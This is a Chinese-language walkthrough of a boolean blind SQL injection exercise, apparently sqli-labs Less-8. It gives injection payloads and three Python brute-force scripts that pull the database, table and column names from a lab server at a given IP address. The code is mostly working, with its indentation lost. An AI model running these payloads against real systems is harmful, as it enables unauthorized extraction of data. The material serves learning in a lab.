- 猜解数据库长度
url?id=1' and length(database())>10 %23
#length() 获取字符串长度
2.猜解数据库名
url?id=1 and ascii(substr(database(),1,1))>96 %23
#ascii码
#substr(string,start,length)
48-57 0-9
65-90 A-Z
97-122 a-z
3.编写脚本刷出数据库名 security
import requests
flag=""
for i in range(1,60):
for j in range(1,130):
url= "http://117.167.136.242:8002/Less-8/?id=1' and ascii(substr(database(),{0},1))={1} %23".format(i,j)
response=requests.get(url)
if "You" in response.text:
flag=flag+chr(j)
print(flag)
4.刷出数据表
import requests
flag=""
for i in range(1,60):
for j in range(1,130):
url= "http://117.167.136.242:8002/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{0},1))={1} -- +".format(i,j)
response=requests.get(url)
if "You" in response.text:
flag=flag+chr(j)
print(flag)
5.编写脚本刷出字段 id
import requests
flag=""
for i in range(0,60):
for j in range(1,130):
url= "http://117.167.136.242:8002/Less-8?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),{},1))={} -- +".format(i,j)
response=requests.get(url)
if "You" in response.text:
flag=flag+chr(j)
print(flag)
解析
盲注:因为传输数据不会有回显,只能根据页面反应来根据语句的对错,而这个页面正确是 会显示you are in
因此我们编写脚本就根据这个